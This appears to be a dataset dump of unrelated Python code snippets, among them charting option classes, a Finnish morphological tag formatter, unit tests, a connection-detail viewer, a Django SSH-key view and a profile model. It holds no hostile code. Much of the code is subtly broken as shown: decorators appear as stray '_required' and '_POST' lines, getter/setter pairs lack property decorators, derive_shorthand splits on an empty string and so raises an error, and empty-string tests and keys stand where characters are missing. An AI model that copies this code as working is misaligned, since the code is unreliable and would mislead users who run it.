code stringlengths 281 23.7M |
|---|
class OptionSeriesXrangeLabel(Options):
def boxesToAvoid(self):
return self._config_get(None)
def boxesToAvoid(self, value: Any):
self._config(value, js_type=False)
def connectorAllowed(self):
return self._config_get(False)
def connectorAllowed(self, flag: bool):
self._config(flag, js_type=False)
def connectorNeighbourDistance(self):
return self._config_get(24)
def connectorNeighbourDistance(self, num: float):
self._config(num, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def format(self):
return self._config_get('undefined')
def format(self, text: str):
self._config(text, js_type=False)
def formatter(self):
return self._config_get('undefined')
def formatter(self, value: Any):
self._config(value, js_type=False)
def maxFontSize(self):
return self._config_get(None)
def maxFontSize(self, num: float):
self._config(num, js_type=False)
def minFontSize(self):
return self._config_get(None)
def minFontSize(self, num: float):
self._config(num, js_type=False)
def onArea(self):
return self._config_get(None)
def onArea(self, flag: bool):
self._config(flag, js_type=False)
def style(self) -> 'OptionSeriesXrangeLabelStyle':
return self._config_sub_data('style', OptionSeriesXrangeLabelStyle)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False) |
class Ftb3Formatter(Formatter):
multichars = {'% A', '% V', '% N', '% Part', '% Abbr', '% Pron', '% Num', '% Prop', '% Interj', '% Dem', '% Interr', '% Rel', '% Qnt', '% Refl', '% N% Abbr', '% %>%>%>', '% CS', '% CC', '% Adv', '% Adp', '% Po', '% Pr', '% Adp% Po', '% Adp% Pr', '% Punct', '% Quote', '% EmDash', '% EnDash', '% Dash', '% Digit', '% Roman', '% Nom', '% Par', '% Gen', '% Ine', '% Ela', '% Ill', '% Ade', '% Abl', '% All', '% Ess', '% Ins', '% Abe', '% Tra', '% Com', '% Lat', '% Acc', '% Sg', '% Pl', '% PxSg1', '% PxSg2', '% PxPl1', '% PxPl2', '% PxPl3', '% Px3', '% TrunCo', 'TrunCo% ', '% TruncPrefix', 'TruncSuffix% ', '% Prt', '% Prs', '% Pst', '% Cond', '% Pot', '% Impv', '% Opt', '% Sg1', '% Sg2', '% Sg3', '% Pl1', '% Pl2', '% Pl3', '% Pe4', '% ConNeg', '% Neg', '% Act', '% Pass', '% Inf1', '% Inf2', '% Inf3', '% Inf5', '% PrsPrc', '% PrsPrc% Act', '% PrsPrc% Pass', '% PrfPrc', '% PrfPrc% Act', '% PrfPrc% Pass', '% AgPrc', '% NegPrc', '% Pos', '% Comp', '% Superl', '% Dem', '% Qnt', '% Pers', '% Indef', '% Interr', '% Refl', '% Rel', '% Ord', '% Foc%_hAn', '% Foc%_kAAn', '% Foc%_kin', '% Foc%_kO', '% Foc%_pA', '% Foc%_s', '% Foc%_kA', '% Man', '% Forgn', '%<Del%>', '%<Del%>'}
stuff2ftb3 = {'Bc': '#', '.sent': '', '.': '.', 'Aa': '', 'Aan': '', 'ABBREVIATION': '% Abbr', 'ABESSIVE': '% Abe', 'ABLATIVE': '% Abl', 'ACRONYM': '% N% Abbr', 'ADESSIVE': '% Ade', 'ADJ': '% A', 'ADJECTIVE': '% A', 'ADP': '% Adp% Po', 'ADV': '% Adv', 'ADVERBIAL': '', 'Aen': '', 'Ahan': '', 'Ahen': '', 'Ahin': '', 'Ahon': '', 'Ahun': '', 'Ahyn': '', 'Ahan': '', 'Ahon': '', 'Aia': '', 'Aiden': '', 'Aien': '', 'Aihin': '', 'Aiin': '', 'Ain': '', 'Aisiin': '', 'Aita': '', 'Aitten': '', 'Aita': '', 'Aia': '', 'Aja': '', 'Ajen': '', 'Aja': '', 'ALLATIVE': '% All', 'Ana': '', 'Aon': '', 'ARROW': '', 'Asa': '', 'Aseen': '', 'Ata': '', 'Aten': '', 'Ata': '', 'Aun': '', 'Ayn': '', 'Aa': '', 'Aan': '', 'Aon': '', 'B-': '% TrunCo', 'B': '% TrunCo', 'B': 'TrunCo% ', 'CARDINAL': '', 'ORDINAL': '% Ord', 'Ccmp': '% Comp', 'CLAUSE-BOUNDARY': '', 'Cma': '% AgPrc', 'Cmaisilla': '% Adv', 'Cmaton': '% NegPrc', 'Cnut': '% PrfPrc', 'COMMA': '', 'COMPARATIVE': '', 'COMP': '% Comp', 'CONJ': '% CC', 'COORDINATING': '', 'Cpos': '% Pos', 'Csup': '% Superl', 'Cva': '% PrsPrc', 'DASH': '% Dash', 'DECIMAL': '', 'DEMONSTRATIVE': '% Dem', 'DERSTI': '', 'DERTTAIN': '', 'DIGIT': '% Digit', 'Din': '', 'Dinen': '', 'Dja': '', 'Dma': '% AgPrc', 'Dmaisilla': '% Inf5', 'Dmaton': '% NegPrc', 'Dminen': '% N', 'Dmpi': '', 'Dhko': '', 'Dtar': '', 'Dnen': '', 'Dlainen': '% N', 'Disa': '% N', 'Dton': '% A', 'Dllinen': '% A', 'Cmainen': '% A', 'Dmainen': '% A', 'Dnut': '% PrfPrc% Act', 'Ds': '', 'Dsti': '', 'Dtattaa': '', 'Dtuttaa': '', 'Dtatuttaa': '', 'Dtava': '% PrsPrc% Pass', 'Dttaa': '', 'Dttain': '', 'Dtu': '% PrfPrc% Pass', 'Du': '', 'Duus': '', 'Dva': '% PrsPrc% Act', 'ELATIVE': '% Ela', 'FINAL-BRACKET': '', 'FINAL-QUOTE': '% Quote', 'FRACTION': '', 'FTB3man': '% Man', 'FTB3MAN': '% Man', 'GENITIVE': '% Gen', 'Ia': '% Inf1', 'Ie': '% Inf2', 'ILLATIVE': '% Ill', 'Ima': '% Inf3', 'Iminen': '% N', 'INDEFINITE': '% Indef', 'INESSIVE': '% Ine', 'INITIAL-BRACKET': '', 'INITIAL-QUOTE': '% Quote', 'INSTRUCTIVE': '% Man', 'INTERROGATIVE': '% Interr', 'INTJ': '% Interj', 'LATIVE': '% Lat', 'LEMMA-END': '', 'LEMMA-START': '', 'LOCATIVE': '% Ess', 'MULTIPLICATIVE': '', 'Ncon': '% ConNeg', 'Nneg': '% Neg', 'NOUN': '% N', 'Npl': '% Pl', 'N??': '% Sg', 'Nsg': '% Sg', 'NUMERAL': '% Num', 'NUM': '% Num', 'O3': '% Px3', 'Opl1': '% PxPl1', 'Opl2': '% PxPl2', 'Osg1': '% PxSg1', 'Osg2': '% PxSg2', 'PARTICLE': '% Part', 'PARTITIVE': '% Par', 'PE4': '% Pe4', 'PERSONAL': '% Pers', 'PL1': '% Pl1', 'PL2': '% Pl2', 'PL3': '% Pl3', 'Ppe4': '% Pe4', 'Ppl1': '% Pl1', 'Ppl2': '% Pl2', 'Ppl3': '% Pl3', 'PREPOSITION': '% Adp% Pr', 'PRONOUN': '% Pron', 'PRON': '% Pron', 'PROPER': '% Prop', 'Psg1': '% Sg1', 'Psg2': '% Sg2', 'Psg3': '% Sg3', 'PUNCTUATION': '% Punct', 'Qhan': '% Foc%_hAn', 'Qkaan': '% Foc%_kAAn', 'Qka': '% Foc%_kA', 'Qkin': '% Foc%_kin', 'Qko': '% Foc%_kO', 'Qpa': '% Foc%_pA', 'Qs': '% Foc%_s', 'QUALIFIER': '% A', 'QUANTIFIER': '% Qnt', 'QUANTOR': '% Qnt', 'RECIPROCAL': '', 'REFLEXIVE': '% Refl', 'RELATIVE': '% Rel', 'ROMAN': '% Roman', 'SCONJ': '% CS', 'SENTENCE-BOUNDARY': '', 'SEPARATIVE': '% Par', 'SG1': '% Sg1', 'SG2': '% Sg2', 'SG3': '% Sg3', 'SPACE': '', 'SUFFIX': '', 'SUPERL': '% Superl', 'Tcond': '% Cond', 'Timp': '% Impv', 'Topt': '% Opt', 'Tpast': '% Pst', 'Tpot': '% Pot', 'Tpres': '% Prs', 'Uarch': '', 'Udial': '', 'Unonstd': '', 'UNSPECIFIED': '% Adv', 'Urare': '', 'Vact': '% Act', 'VERB': '% V', 'Vpss': '% Pass', 'X': '', 'Xabe': '% Abe', 'Xabl': '% Abl', 'Xacc': '% Acc', 'Xade': '% Ade', 'Xall': '% All', 'Xcom': '% Com', 'Xela': '% Ela', 'Xess': '% Ess', 'XForeign': '% Forgn', 'Xgen': '% Gen', 'Xill': '% Ill', 'Xine': '% Ine', 'Xins': '% Ins', 'Xlat': '% Lat', 'X???': '% Nom', 'Xnom': '% Nom', 'Xpar': '% Par', 'Xtra': '% Tra', '': ''}
def __init__(self, verbose=True):
self.verbose = verbose
fail = False
for (stuff, ftb3) in self.stuff2ftb3.items():
if (len(ftb3) < 2):
continue
elif (ftb3 not in self.multichars):
just_fail((((('There are conflicting formattings in here!\n' + ftb3) + ' for ') + stuff) + ' is not a valid defined ftb3 multichar_symbol!'))
fail = True
if fail:
self.tainted = True
def stuff2lexc(self, stuff):
if (stuff == '0'):
return '0'
elif (stuff in self.stuff2ftb3):
return self.stuff2ftb3[stuff]
else:
if self.verbose:
fail_formatting_missing_for(stuff, 'ftb3.1')
return ''
def analyses2lexc(self, anals, surf):
ftbstring = ''
if ('Nneg|Vact' in anals):
anals = anals.replace('|Vact', '')
elif (anals == 'Vact|Ia|Xlat'):
anals = 'Ia|Xlat'
elif (anals == 'Vact|Ima|Xins'):
anals = 'Ima|FTB3man'
elif ('Vact|Ima' in anals):
anals = anals.replace('Vact|', '')
elif (anals == 'Vact|Ie|Nsg|Xins'):
anals = 'Ie|Vact|FTB3man'
elif (anals == 'Vact|Tpres|Ppe4|Ncon'):
anals = 'Vact|Tpres|Ncon'
elif (anals == 'Vpss|Tpres|Ppe4|Ncon'):
anals = 'Vpss|Tpres|Ncon'
elif ('Dmaton' in anals):
anals = anals.replace('Dmaton', 'Cmaton')
elif ('Dma' in anals):
anals = anals.replace('Dma', 'Cma')
parts = anals.split('|')
reordered = []
for part in parts:
if part.startswith(''):
reordered.append(part)
for part in parts:
if part.startswith('I'):
reordered.append(part)
for part in parts:
if part.startswith('T'):
reordered.append(part)
elif part.startswith('C'):
reordered.append(part)
for part in parts:
if part.startswith('V'):
reordered.append(part)
for part in parts:
if part.startswith('X'):
reordered.append(part)
parts = [x for x in parts if ((not x.startswith('X')) and (not x.startswith('T')) and (not x.startswith('C')) and (not x.startswith('I')) and (not x.startswith('V')) and (not x.startswith('')))]
for part in parts:
reordered.append(part)
for anal in reordered:
if (anal == '-'):
ftbstring += lexc_escape(surf)
elif (anal.startswith('') and anal.endswith('')):
ftbstring += lexc_escape(anal[len(''):(- len(''))])
else:
ftbstring += self.stuff2lexc(anal)
return ftbstring
def continuation2lexc(self, anals, surf, cont):
ftbstring = self.analyses2lexc(anals, surf)
if ('COMPOUND' in cont):
ftbstring = surf.replace(morph_boundary, '').replace(deriv_boundary, '')
surf = lexc_escape(surf)
return ('%s:%s\t%s ;\n' % (ftbstring, surf, cont))
def wordmap2lexc(self, wordmap):
if (wordmap['stub'] == ' '):
return ''
wordmap['stub'] = lexc_escape(wordmap['stub'].replace(word_boundary, optional_hyphen))
wordmap['analysis'] = ('%s' % lexc_escape((wordmap['bracketstub'].replace(word_boundary, '#') + '<Del>')))
if (((wordmap['pos'] == 'ACRONYM') and ((len(wordmap['stub']) == 1) and (not wordmap['stub'].isalpha()))) or (wordmap['stub'] == '')):
wordmap['analysis'] += self.stuff2lexc('PUNCTUATION')
elif (wordmap['pos'] in ['NOUN', 'VERB', 'ADJECTIVE', 'PRONOUN', 'NUMERAL', 'ACRONYM', 'PUNCTUATION', 'SUFFIX']):
wordmap['analysis'] += self.stuff2lexc(wordmap['pos'])
elif (wordmap['pos'] == 'CONJUNCTIONVERB'):
if (wordmap['lemma'] == 'eika'):
wordmap['analysis'] = ((wordmap['lemma'] + self.stuff2lexc('CONJ')) + self.stuff2lexc('Nneg'))
else:
wordmap['analysis'] += (self.stuff2lexc('ADVERBIAL') + self.stuff2lexc('Nneg'))
elif (wordmap['pos'] == 'PARTICLE'):
if (wordmap['upos'] in ['CONJ', 'SCONJ', 'INTJ', 'ADV', 'ADP']):
wordmap['analysis'] += self.stuff2lexc(wordmap['upos'])
else:
wordmap['analysis'] += self.stuff2lexc('PARTICLE')
elif (wordmap['pos'] == 'PROPN'):
print('???', wordmap)
elif (wordmap['pos'] == 'X'):
wordmap['analysis'] += self.stuff2lexc('NOUN')
else:
fail_guess_because(wordmap, [], ['PARTICLE', 'PROPN', 'NOUN', 'VERB', 'ADJECTIVE', 'PRONOUN', 'NUMERAL', 'ACRONYM', 'PUNCTUATION'], 'not in FTB3 known poses or particle!')
exit(1)
if wordmap['prontype']:
if ('PERSONAL' in wordmap['prontype']):
wordmap['prontype'] = 'PERSONAL'
for stuff in wordmap['prontype'].split('|'):
wordmap['analysis'] += self.stuff2lexc(stuff)
if wordmap['lex']:
for stuff in wordmap['lex'].split('|'):
wordmap['analysis'] += self.stuff2lexc(stuff)
if wordmap['abbr']:
for stuff in wordmap['abbr'].split('|'):
wordmap['analysis'] += self.stuff2lexc(stuff)
if wordmap['numtype']:
for stuff in wordmap['numtype'].split('|'):
wordmap['analysis'] += self.stuff2lexc(stuff)
if wordmap['is_proper']:
wordmap['analysis'] += self.stuff2lexc('PROPER')
if wordmap['symbol']:
for subcat in wordmap['symbol'].split('|'):
wordmap['analysis'] += self.stuff2lexc(subcat)
if (wordmap['lemma'] == ''):
wordmap['analysis'].replace('Dash', 'EnDash')
if (wordmap['lemma'] == ''):
wordmap['analysis'].replace('Dash', 'EmDash')
lex_stub = wordmap['stub']
retvals = []
if ('BLACKLIST' in wordmap['new_para']):
retvals += [('! ! !%s:%s\t%s\t;' % (wordmap['analysis'], lex_stub, wordmap['new_para']))]
else:
retvals += [('%s:%s\t%s\t;' % (wordmap['analysis'], lex_stub, wordmap['new_para']))]
if (wordmap['lemma'] in ['-', '', '', '(']):
retvals += [('%s%% %%>%%>%%>:%s\t%s\t;' % (wordmap['analysis'], lex_stub, wordmap['new_para']))]
return '\n'.join(retvals)
def multichars_lexc(self):
multichars = 'Multichar_Symbols\n'
multichars += '!! FTB 3.1 multichar set:\n'
for mcs in self.multichars:
multichars += (mcs + '\n')
multichars += Formatter.multichars_lexc(self)
return multichars
def root_lexicon_lexc(self):
root = Formatter.root_lexicon_lexc(self)
if True:
root += '!! LEXICONS that can be co-ordinated hyphen -compounds\n'
root += (self.stuff2lexc('B') + ':- NOUN ;\n')
root += (self.stuff2lexc('B') + ':- ADJ ;\n')
root += (self.stuff2lexc('B') + ':- SUFFIX ;\n')
return root |
class OptionPlotoptionsHeatmapStatesSelect(Options):
def animation(self) -> 'OptionPlotoptionsHeatmapStatesSelectAnimation':
return self._config_sub_data('animation', OptionPlotoptionsHeatmapStatesSelectAnimation)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def halo(self) -> 'OptionPlotoptionsHeatmapStatesSelectHalo':
return self._config_sub_data('halo', OptionPlotoptionsHeatmapStatesSelectHalo)
def lineWidth(self):
return self._config_get(None)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def lineWidthPlus(self):
return self._config_get(1)
def lineWidthPlus(self, num: float):
self._config(num, js_type=False)
def marker(self) -> 'OptionPlotoptionsHeatmapStatesSelectMarker':
return self._config_sub_data('marker', OptionPlotoptionsHeatmapStatesSelectMarker) |
class OptionSeriesDumbbellSonificationDefaultspeechoptionsMappingRate(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class _Nothing(Type):
def __init__(self):
pass
def __and__(self, other):
return self
def __or__(self, other):
return other
def __sub__(self, other):
return self
def __xor__(self, other):
return other
def __invert__(self):
return tAll
def __repr__(self):
return 'tNothing'
def __contains__(self, value):
return False
def __call__(self, *values):
return False
def __iter__(self):
pass
__pnmltype__ = 'empty'
def __pnmldump__(self):
return Tree(self.__pnmltag__, None, domain=self.__pnmltype__)
def __pnmlload__(cls, tree):
return cls() |
def test_action_monitoring():
env = build_dummy_maze_env()
env = MazeEnvMonitoringWrapper.wrap(env, observation_logging=False, action_logging=True, reward_logging=False)
env = LogStatsWrapper.wrap(env)
env.reset()
for ii in range(2):
env.step(env.action_space.sample())
action_events = env.get_last_step_events(query=[ActionEvents.discrete_action, ActionEvents.continuous_action, ActionEvents.multi_binary_action])
assert (len(action_events) == 7)
for event in action_events:
if (event.attributes['name'] in ['action_0_0', 'action_0_1_0', 'action_0_1_1', 'action_1_0']):
assert (event.interface_method == ActionEvents.discrete_action)
elif (event.attributes['name'] in ['action_0_2', 'action_2_0']):
assert (event.interface_method == ActionEvents.continuous_action)
elif (event.attributes['name'] in ['action_1_1']):
assert (event.interface_method == ActionEvents.multi_binary_action)
else:
raise ValueError |
class ConnDetails(InfoWindow):
def __init__(self, parent):
super().__init__(parent)
self._db = Database.instance()
self._nodes = Nodes.instance()
def showByField(self, field, value):
records = self._db.get_connection_by_field(field, value)
if (not records.next()):
return
node = records.value(ConnFields.Node)
uid = records.value(ConnFields.UID)
if self._nodes.is_local(node):
uid = Utils.get_user_id(uid)
conn_text = QC.translate('stats', '\n<b>{0}</b><br><br>\n<b>Time:</b> {1}<br><br>\n<b>Process:</b><br>{2}<br>\n<b>Cmdline:</b><br>{3}<br>\n<b>CWD:</b><br>{4}<br><br>\n<b>UID:</b> {5} <b>PID:</b> {6}<br>\n<br>\n<b>Node:</b> {7}<br><br>\n<b>{8}</b> {9}:{10} -> {11} ({12}):{13}\n<br><br>\n<b>Rule:</b><br>\n{14}\n'.format(records.value(ConnFields.Action).upper(), records.value(ConnFields.Time), records.value(ConnFields.Process), records.value(ConnFields.Cmdline), records.value(ConnFields.CWD), uid, records.value(ConnFields.PID), node, records.value(ConnFields.Protocol).upper(), records.value(ConnFields.SrcPort), records.value(ConnFields.SrcIP), records.value(ConnFields.DstIP), records.value(ConnFields.DstHost), records.value(ConnFields.DstPort), records.value(ConnFields.Rule)))
self.showText(conn_text) |
def derive_shorthand(host_string):
user_hostport = host_string.rsplit('', 1)
hostport = user_hostport.pop()
user = (user_hostport[0] if (user_hostport and user_hostport[0]) else None)
if (hostport.count(':') > 1):
host = hostport
port = None
else:
host_port = hostport.rsplit(':', 1)
host = (host_port.pop(0) or None)
port = (host_port[0] if (host_port and host_port[0]) else None)
if (port is not None):
port = int(port)
return {'user': user, 'host': host, 'port': port} |
class Client():
def __init__(self, *, nodes=None, info=None, indices=None, transform=None, cluster=None, transport_client=None, is_serverless=None):
self.nodes = nodes
self._info = wrap(info)
self.indices = indices
self.transform = transform
self.cluster = cluster
if transport_client:
self.transport = transport_client
self.is_serverless = is_serverless
def info(self):
return self._info()
def perform_request(self, *args, **kwargs):
return self.transport.perform_request(*args, **kwargs) |
def test_pca_bedgraph_lieberman():
pca1 = NamedTemporaryFile(suffix='.bedgraph', delete=False)
pca2 = NamedTemporaryFile(suffix='.bedgraph', delete=False)
pca1.close()
pca2.close()
matrix = (ROOT + 'small_test_matrix_50kb_res.h5')
args = '--matrix {} --outputFileName {} {} -f bedgraph --whichEigenvectors 1 2 --method lieberman'.format(matrix, pca1.name, pca2.name).split()
hicPCA.main(args)
assert are_files_equal((ROOT + 'hicPCA/pca1.bedgraph'), pca1.name)
assert are_files_equal((ROOT + 'hicPCA/pca2.bedgraph'), pca2.name)
os.unlink(pca1.name)
os.unlink(pca2.name) |
def extractGodcomplextranslationsWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('shepherding humanity', 'shepherding humanity', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_image_from_flytectl_config():
os.environ['FLYTECTL_CONFIG'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'configs/sample.yaml')
image_config = ImageConfig.auto(config_file=None)
assert (image_config.images[0].full == 'docker.io/xyz:latest')
assert (image_config.images[1].full == 'docker.io/abc:None') |
def set_location(sym, loc):
assert isinstance(sym, goto_ast.Irep)
assert isinstance(loc, Location)
sloc = goto_ast.Irep('')
sloc.set_attribute('file', loc.filename)
if (loc.line is not None):
sloc.set_attribute('line', str(loc.line))
if (loc.col_start is not None):
sloc.set_attribute('column', ('%u:%u' % (loc.col_start, loc.col_end)))
sym.named_sub['#source_location'] = sloc |
def crawl_tree_and_set_ratios(result):
for field in result:
if (field in ['ratio', 'count', 'stats']):
continue
total = result[field]['total']
for value in result[field]:
if (value == 'total'):
continue
result[field][value]['ratio'] = (result[field][value]['count'] / total)
crawl_tree_and_set_ratios(result[field][value]) |
class TestApi(unittest.TestCase):
def test_tester_import(self):
from traitsui.testing.api import UITester
def test_commands_imports(self):
from traitsui.testing.api import MouseClick, KeyClick, KeySequence
def test_query_imports(self):
from traitsui.testing.api import DisplayedText, IsChecked, IsEnabled, IsVisible, SelectedText
def test_locator_imports(self):
from traitsui.testing.api import Index, TargetById, TargetByName, Textbox, Slider
def test_advanced_usage_imports(self):
from traitsui.testing.api import TargetRegistry
def test_exceptions_imports(self):
from traitsui.testing.api import Disabled, InteractionNotSupported, LocationNotSupported, TesterError |
class OptionPlotoptionsWaterfallSonificationTracksPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
class Formatter(GObject.GObject):
__gproperties__ = {'format': (GObject.TYPE_STRING, 'format string', 'String the formatting is based on', '', GObject.ParamFlags.READWRITE)}
def __init__(self, format):
GObject.GObject.__init__(self)
self._template = ParameterTemplate(format)
self._substitutions = {}
def do_get_property(self, property):
if (property.name == 'format'):
return self._template.template
else:
raise AttributeError(('unknown property %s' % property.name))
def do_set_property(self, property, value):
if (property.name == 'format'):
if (value != self._template.template):
self._template.template = value
else:
raise AttributeError(('unknown property %s' % property.name))
Extractions = Dict[(str, Tuple[(str, Dict[(str, Union[(bool, str)])])])]
def extract(self) -> Extractions:
matches = self._template.pattern.finditer(self._template.template)
extractions: Formatter.Extractions = {}
for match in matches:
groups = match.groupdict()
identifier = (groups['braced'] or groups['named'])
if (identifier is None):
continue
identifier_parts = [identifier]
parameters = {}
if (groups['parameters'] is not None):
parameters = [p.lstrip() for p in re.split('(?<!\\\\),', groups['parameters'])]
parameters = [(re.split('(?<!\\\\)=', p, 1) + [True])[:2] for p in parameters]
parameters = dict(parameters)
for p in parameters:
argument = parameters[p]
if (not isinstance(argument, bool)):
argument = argument.replace('\\,', ',')
argument = argument.replace('\\}', '}')
argument = argument.replace('\\=', '=')
parameters[p] = argument
identifier_parts += [groups['parameters']]
extractions[':'.join(identifier_parts)] = (identifier, parameters)
return extractions
def format(self, *args):
extractions = self.extract()
substitutions = {}
for (needle, (identifier, parameters)) in extractions.items():
substitute = None
if (needle in self._substitutions):
substitute = self._substitutions[needle]
elif (identifier in self._substitutions):
substitute = self._substitutions[identifier]
if (substitute is not None):
prefix = parameters.pop('prefix', '')
suffix = parameters.pop('suffix', '')
pad = int(parameters.pop('pad', 0))
padstring = parameters.pop('padstring', '')
if callable(substitute):
substitute = substitute(*args, **parameters)
if ((pad > 0) and padstring):
pad = max(0, (pad - len(substitute)))
padcount = ((pad // len(padstring)) + 1)
padstring = (padcount * padstring)
padstring = padstring[0:pad]
substitute = ('%s%s' % (padstring, substitute))
if substitute:
substitute = ('%s%s%s' % (prefix, substitute, suffix))
substitutions[needle] = substitute
return self._template.safe_substitute(substitutions) |
class OptionPlotoptionsXrangeTooltipDatetimelabelformats(Options):
def day(self):
return self._config_get('%A, %e %b %Y')
def day(self, text: str):
self._config(text, js_type=False)
def hour(self):
return self._config_get('%A, %e %b, %H:%M')
def hour(self, text: str):
self._config(text, js_type=False)
def millisecond(self):
return self._config_get('%A, %e %b, %H:%M:%S.%L')
def millisecond(self, text: str):
self._config(text, js_type=False)
def minute(self):
return self._config_get('%A, %e %b, %H:%M')
def minute(self, text: str):
self._config(text, js_type=False)
def month(self):
return self._config_get('%B %Y')
def month(self, text: str):
self._config(text, js_type=False)
def second(self):
return self._config_get('%A, %e %b, %H:%M:%S')
def second(self, text: str):
self._config(text, js_type=False)
def week(self):
return self._config_get('Week from %A, %e %b %Y')
def week(self, text: str):
self._config(text, js_type=False)
def year(self):
return self._config_get('%Y')
def year(self, text: str):
self._config(text, js_type=False) |
def run(space, spline, tuning, mirror, res, dump):
tune = [[(int(i) if (e < 3) else float(i)) for (e, i) in enumerate(x.split(':'))] for x in tuning]
class Achroma(Achromatic):
L_IDX = 0
C_IDX = 1
H_IDX = 2
def convert(self, coords, **kwargs):
lab = Color('srgb', coords).convert(space)
l = lab[0]
(c, h) = alg.rect_to_polar(*lab[1:(- 1)])
return (l, c, h)
test = Achroma(spline=spline, mirror=mirror)
test.calc_achromatic_response(tune)
color = Color('srgb', [0, 0, 0])
points1 = {}
points2 = {}
diff_over = 0
diff_under = 0
min_h = math.inf
max_h = (- math.inf)
max_c = 0
first = False
for i in range((res + 1)):
div = (res / 5)
v = (i / div)
if (v < 0.001):
continue
color.update('srgb', [v, v, v])
lab = color.convert(space, norm=False)
l = lab[0]
(c, h) = alg.rect_to_polar(*lab[1:(- 1)])
if (not first):
print('Starting L: ', l)
print('Starting C: ', c)
first = True
if (c > max_c):
max_c = c
if (h < min_h):
min_h = h
if (h > max_h):
max_h = h
domain = test.scale(l)
calc = test.spline(domain)
delta = (calc[1] - c)
if ((delta >= 0) and (delta > diff_over)):
diff_over = delta
if ((delta < 0) and (abs(delta) > diff_under)):
diff_under = abs(delta)
points1[l] = (c, h)
points2[calc[0]] = (calc[1], calc[2])
print('Delta Over: ', diff_over)
print('Delta Under: ', diff_under)
print('Max C: ', max_c)
print('Hue (low/high) : {} / {}'.format(min_h, max_h))
print('Data Points: ', test.spline.length)
l1 = []
l2 = []
c1 = []
c2 = []
h1 = []
h2 = []
for l in sorted(points1):
l1.append(l)
c1.append(points1[l][0])
h1.append(points1[l][1])
for l in sorted(points2):
l2.append(l)
c2.append(points2[l][0])
h2.append(points2[l][1])
figure = plt.figure()
ax = plt.axes(projection='3d', xlabel='C', ylabel='h', zlabel='L')
ax.set_title('LCh: Delta (over/under) = {:.5g}/{:.5g} - Max C = {:.5g}'.format(diff_over, diff_under, max_c))
figure.add_axes(ax)
plt.style.use('seaborn-v0_8-whitegrid')
plt.plot(c1, l1, '.', color='black')
plt.plot(c2, l2, '.', color='red', markersize=0.5)
plt.show()
if dump:
print('===== Data =====')
print(test.dump())
return 0 |
_required
_required
_POST
def sshkey(request, action):
if (action == 'add'):
sform = SSHKeyForm(request, None, request.POST)
if sform.is_valid():
status = sform.save(action='create', args=(request.user.username, sform.cleaned_data['name']))
if (status == 201):
messages.success(request, _('SSH key was successfully saved'))
return redirect('profile')
return render(request, 'gui/profile/profile_sshkey_form.html', {'user': request.user, 'sform': sform}, status=200)
elif (action == 'delete'):
res = SSHKeyForm.api_call('delete', None, request, args=(request.user.username, request.POST.get('name')))
status = res.status_code
if (status == 200):
messages.success(request, _('SSH key was successfully removed'))
return redirect('profile')
return render(request, 'gui/profile/profile_sshkey_list.html', {'user': request.user, 'ssh_keys': request.user.usersshkey_set.all().order_by('id')}, status=status) |
def test_registry_releases_properly(empty_sol_registry):
release_id_1 = empty_sol_registry._release('package', '1.0.0', 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGV')
release_id_2 = empty_sol_registry._release('package1', '1.0.1', 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGZ')
release_data_1 = empty_sol_registry._get_release_data(release_id_1)
release_data_2 = empty_sol_registry._get_release_data(release_id_2)
assert (release_data_1[0] == 'package')
assert (release_data_1[1] == '1.0.0')
assert (release_data_1[2] == 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGV')
assert (release_data_2[0] == 'package1')
assert (release_data_2[1] == '1.0.1')
assert (release_data_2[2] == 'ipfs://Qme4otpS88NV8yQi8TfTP89EsQC5bko3F5N1yhRoi6cwGZ') |
class OptionsSelection(Options):
def enabled(self):
return self._config_get(None)
def enabled(self, val: bool):
self._config(val)
def grouped(self):
return self._config_get(False)
def grouped(self, val):
self._config(val)
def multiple(self):
return self._config_get(None)
def multiple(self, flag: bool):
self._config(flag)
def draggable(self):
return self._config_get(None)
def draggable(self, val: bool):
self._config(val)
def isselectable(self, js_funcs: etypes.JS_FUNCS_TYPES, profile: etypes.PROFILE_TYPE=None):
pass |
def get_thread_ts_from_dynamodb(cfg: Config, event: dict, dynamodb_client) -> (str | None):
hash_vaule = hash_user_identity_and_event_name(event)
if (not hash_vaule):
return None
item = check_dynamodb_for_similar_events(hash_value=hash_vaule, dynamodb_client=dynamodb_client, cfg=cfg)
if item:
return item['thread_ts']['S']
else:
return None |
class UserProfile(models.Model):
user = models.OneToOneField(User, related_name='profile')
updated = models.DateTimeField(auto_now=True)
image = ProcessedImageField(upload_to=profile_img_upload_to, processors=[ResizeToFill(300, 300)], format='JPEG', options={'quality': 90})
image_thumb = ImageSpecField(source='image', processors=[ResizeToFill(150, 150)], format='JPEG', options={'quality': 90})
bio = models.TextField('About you', blank=True, null=True)
links = models.TextField(help_text='Comma-separated', blank=True, null=True)
